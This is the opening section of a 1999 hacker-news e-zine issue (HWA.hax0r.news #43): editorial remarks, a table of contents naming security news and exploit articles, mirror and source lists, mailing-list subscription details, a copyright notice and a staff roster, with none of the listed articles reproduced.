[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA'99=] Number 43 Volume 1 1999 Nov 21st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

Shit a week late again, another fucking cold, man I hate colds! fuck,
anyway this issue covers Nov 14th - Nov 21st #44 will cover Nov 22nd to
Nov 28th. Seen?

==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================

Today the spotlight may be on you, some interesting machines that have
accessed these archives recently...
                                   Hits

There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good to see our boys keeping up
with the news... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!

http://www.csoft.net/~hwa

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

The Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative. Among true
computer people, being called a hacker is a compliment. One of the traits
of the true hacker is a profoundly antibureaucratic and democratic
spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
    degrees, age, race, or position.
5 - You create art and beauty on a computer.
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched since
formatting will destroy syntax.

I received an email recently about the formatting of this newsletter,
suggesting that it be formatted to 75 columns, in the past I've
endeavoured to format all text to 80 cols except for articles and site
statements and urls which are posted verbatim, I've decided to continue
with this method unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

*  Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed the file
   size limitations imposed by the sites :-( please only use these if no
   other recourse is available.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html.           ** NEW **
http://www.alldas.de/hwaidx1.htm                   ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.                   *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use out
of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour of
love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how the
most famous/infamous hackers are the ones that get caught? there's a lot
to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #43
=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by
and idle a while and say hi...

**************************************************************************
                              Eris Free Net
                             #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed        ***
***                                                                    ***
*** please join to discuss or impart news on from the zine and around  ***
*** the zine or just to hang out, we get some interesting visitors you ***
*** could be one of em.                                                ***
***                                                                    ***
*** Note that the channel isn't there to entertain you its purpose is  ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips  ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
***                                                                    ***
**************************************************************************

=--------------------------------------------------------------------------=
                                 Contents
=--------------------------------------------------------------------------=
                                [ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Bubbleboy email worm description.................................
04.0 .. WinNT.Infis.4608 new Win NT virus................................
05.0 .. OSALL Interview with Flipz 1st person to deface a Microsoft site.
06.0 .. Online encrypted privacy for email and WWW.......................
07.0 .. More on the Chris Buckley Saga...................................
08.0 .. Security Practices Today, Or Lack Thereof .......................
09.0 .. Internet Wiretapping Still a Possibility ........................
10.0 .. Stock Prices Manipulated in China ...............................
11.0 .. Rumours: Vent of level Seven raided by FBI ......................
12.0 .. Electronic Information Stolen from Egypt ........................
13.0 .. Aleph One Gives NPR Interview ...................................
14.0 .. South American Con Announced ....................................
15.0 .. New Ezines Released .............................................
16.0 .. BO2K Marketing Plan (Very funny reading, check this out).........
17.0 .. Canada Loses Classified Documents ...............................
18.0 .. Guilty Plea in Media City Defacement ............................
19.0 .. Hong Kong's Department of Highways Defaced ......................
20.0 .. You Have No Privacy Anyway (scary) ..............................
21.0 .. ACLU to Monitor Echelon .........................................
22.0 .. NSA Gets Patent on Analyzing Speech .............................
23.0 .. New Ezine and Web Site - PrivacyPlace Launches ..................
24.0 .. Vendor Response Archive .........................................
25.0 .. Another from Cuartango: More Microsoft Security Holes ...........
26.0 .. DOD helps Local Cops in Fighting CyberCrime .....................
27.0 .. BSA Busts IRC Pirates ...........................................
28.0 .. US Concerned About Chinese Statements ...........................
29.0 .. The state of the net in Bulgaria.................................
30.0 .. More on the PIII chip ID.........................................
31.0 .. Security Lawsuits Next After Y2K ................................
32.0 .. Another Singaporean Cyber Intruder Pleads Guilty ................
33.0 .. SingCERT Releases Year to Date Stats ............................
34.0 .. Canadian Telecom Firm Gets Security Clearance ...................
35.0 .. Dell Gets Some FunLove ..........................................
36.0 .. Melissa Hits Disney .............................................
37.0 .. How the Anti Virus Industry Works ...............................
38.0 .. FBI Releases Anti Cyber Crime Video .............................
39.0 .. Adobe Introduces Potentially Flawed Security System .............
40.0 .. The 'Enemy' Speaks at Security Conference .......................
41.0 .. Defense Fund Started for Warez4Cable + interviews................
42.0 .. Menwith Hill To Get Upgrade Monies ..............................
43.0 .. CSIS Lost Classified Floppy Disk (hahaha)........................
44.0 .. Hitachi Chip May Prevent Use of Third-party Printer Cartridges ..
45.0 .. NEW MACRO VIRUS OUT THERE........................................
46.0 .. GLOBALNET, CROATIAN ISP COMPROMISED..............................
47.0 .. SEC FILES CHARGES................................................
48.0 .. G6 FTP SERVER v2.0 PROBLEMS......................................
49.0 .. RED HAT SECURITY ADVISORY........................................
50.0 .. HPING............................................................
51.0 .. RPM UPDATE HELPING UTILITY.......................................
52.0 .. WebBBS Ver2.13 Exploit / Shadow Penguin Security.................
53.0 .. SENATE.GOV BITES THE DUST........................................
54.0 .. NEW NESSUS.......................................................
55.0 .. DELEGATE BUFFER OVERFLOWS .......................................
56.0 .. SSH PROBLEMS.....................................................
57.0 .. TORVALDS: COUPLE OF QUESTIONS....................................
58.0 .. 2K PREPARATIONS CAUSED PROBLEMS..................................
59.0 .. IS MICROSOFT TO BLAME FOR Y2K?...................................
60.0 .. $50 MILLIONS FOR Y2K CENTER......................................
61.0 .. EYES ON EXEC 2.32................................................
62.0 .. CHECKPOINT AND LINUX.............................................
63.0 .. NOVELL SIMPLIFIES THINGS.........................................
64.0 .. RPC.NFSD PROBLEMS................................................
65.0 .. Eserv 2.50 Web interface Server Directory Traversal Vulnerability
66.0 .. RFP9906 - RFPoison...............................................

=-------------------------------------------------------------------------------=

AD.S   .. Post your site ads or etc here, if you can offer something in
          return thats tres cool, if not we'll consider ur ad anyways so
          send it in. ads for other zines are ok too btw just mention us
          in yours, please remember to include links and an email
          contact. Corporate ads will be considered also and if your
          company wishes to donate to or participate in the upcoming
          Canc0n99 event send in your suggestions and ads now...n.b date
          and time may be pushed back join mailing list for up to date
          information.
          Current dates: POSTPONED til further notice, place: TBA

Ha.Ha  .. Humour and puzzles .............................................
          Hey You!
          =------=
          Send in humour for this section! I need a laugh and its hard
          to find good stuff... ;)

SITE.1 .. Featured site, .................................................
H.W    .. Hacked Websites ................................................
A.0    .. APPENDICES......................................................
A.1    .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT?
     V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF
THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE
RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND
IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE
FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE
GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS
Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS
ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME
PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE
(C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR.

- EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected.
News is news so i'll print any and all news but will quote sources when
the source is known, if its good enough for CNN its good enough for me.
And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..)
and wish to send printed matter like newspaper clippings a subscription
to your cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please no
more inflatable sheep or plastic dog droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you
~~~~~~~  are reading this from some interesting places, make my day and
get a mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool dude
/ gal and send a poor guy a postcard preferably one that has some scenery
from your place of residence for my collection, I collect stamps too so
you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by
  you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
  compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
  tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
  fun or social engineering examples or transcripts thereof.
Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Websites;

sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is
compiled and or sourced by Cruciphux no copyright claimed.

News & I/O zine .................
http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm

http://freespeech.org/eua/        Electronic Underground Affiliation
http://ech0.cjb.net               ech0 Security
http://axon.jccc.net/hir/         Hackers Information Report
http://net-security.org           Net Security
http://www.403-security.org       Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that
you don't care whether the article/email is to be used in an issue or
not and may be used at my discretion.

Looking for: Good news sites that are not already listed here OR on the
HNN affiliates page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info   (Far from complete)   Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~   ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993. It is searchable
with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

Link

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting
their vulnerabilities. It is about defining, recognizing, and preventing
use of security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are
responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium
outside the distribution of this list may be challenged by you, the
author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on
June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to
SECURITYFOCUS.COM.
What is Security Focus you ask? Wait and read below. Other than the
change of domains nothing of how the list is run changes. I am still the
moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives
go back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options will
be moved transparently.

Any of you using mail filters (e.g. procmail) to sort incoming mail into
mail folders by examining the From address will have to update them to
include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums in the
spirit of BUGTRAQ where non-English speaking people or people that don't
feel comfortable speaking English can exchange information.

As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ
will continue to be the place to submit vulnerability information, but
if you feel more comfortable using some other language you can give the
other lists a try. All relevant information from the other lists which
have not already been covered here will be translated and forwarded on
by the list moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese)
which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which
will be moderated by CORE SDI S.A. from Argentina (the folks that brought
you Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same time
providing a comprehensive source of security information.
Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the
Geek Girl herself!) have moved over to Security Focus to help us with
building this new community. The other staff at Security Focus are
largely derived from long time supporters of Bugtraq and the community
in general. If you are interested in viewing the staff pages, please see
the 'About' section on www.securityfocus.com.

On the community creating front you will find a set of forums and
mailing lists we hope you will find useful. A number of them are not
scheduled to start for several weeks but starting today the following
list is available:

* Incidents' Mailing List. BUGTRAQ has always been about the discussion
  of new vulnerabilities. As such I normally don't approve messages about
  break-ins, trojans, viruses, etc with the exception of widespread cases
  (Melissa, ADM worm, etc). The other choice people are usually left with
  is email CERT but this fails to communicate this important information
  to others that may be potentially affected. The Incidents mailing list
  is a lightly moderated mailing list to facilitate the quick exchange of
  security incident information. Topical items include such things as
  information about rootkits, new trojan horses and viruses, source of
  attacks and tell-tale signs of intrusions.

  To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

  SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.

*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online
communities. If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.

On the information resource front you find a large database of the
following:

* Vulnerabilities.
  We are making accessible a free vulnerability database. You can search
  it by vendor, product and keyword. You will find detailed information
  on the vulnerability and how to fix it, as well as links to reference
  information such as email messages, advisories and web pages. You can
  search by vendor, product and keywords. The database itself is the
  result of culling through 5 years of BUGTRAQ plus countless other lists
  and news groups. It's a shining example of how thorough full disclosure
  has made a significant impact on the industry over the last half
  decade.

* Products. An incredible number of categorized security products from
  over two hundred different vendors.

* Services. A large and focused directory of security services offered
  by vendors.

* Books, Papers and Articles. A vast number of categorized security
  related books, papers and articles. Available to download directly
  from our servers when possible.

* Tools. A large array of free security tools. Categorized and available
  for download.

* News: A vast number of security news articles going all the way back
  to 1995.

* Security Resources: A directory to other security resources on the
  net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display only
information you may be interested in. You can filter by categories,
keywords and operating systems, as well as configure how much data to
display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as
long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful.
I invite you to visit http://www.securityfocus.com/ and check it out for
yourself. If you have any comments or suggestions please feel free to
contact me at this address or at aleph1@securityfocus.com.

Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way I'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away..

Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occurred, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04  0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more.

The subject line will always contain the title of the article, so that you may quickly and efficiently filter past the articles of no interest.

This list will contain:

 o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more.
 o Information on where to obtain articles in current magazines.
 o Security Book reviews and information.
 o Security conference/seminar information.
 o New security product information.
 o And anything else that comes to mind..

Feedback is encouraged.
The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list.

Please do NOT:
 * subscribe vanity mail forwards to this list
 * subscribe from 'free' mail addresses (ie: juno, hotmail)
 * enable vacation messages while subscribed to mail lists
 * subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs.

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

